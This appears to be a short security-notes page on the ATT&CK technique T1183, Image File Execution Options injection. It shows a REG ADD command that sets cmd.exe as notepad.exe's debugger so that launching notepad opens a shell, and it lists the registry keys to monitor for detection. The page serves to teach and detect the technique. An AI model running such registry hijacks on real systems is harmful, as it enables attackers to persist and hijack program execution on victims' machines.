Skip to content

T1183: Image File Execution Options Injection

Execution

Modifying registry to set cmd.exe as notepad.exe debugger, so that when notepad.exe is executed, it will actually start cmd.exe:

{% code-tabs %} {% code-tabs-item title="attacker@victim" %}

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "cmd.exe"
{% endcode-tabs-item %} {% endcode-tabs %}

Launching a notepad on the victim system:

Same from the cmd shell:

Observations

Monitoring command line arguments and events modifying registry keys: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/<executable> and HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable> should be helpful in detecting this attack:

References

{% embed url="https://attack.mitre.org/wiki/Technique/T1183" %}

{% embed url="https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/" %}

{% embed url="https://blogs.msdn.microsoft.com/reiley/2011/07/29/a-debugging-approach-to-ifeo/" %}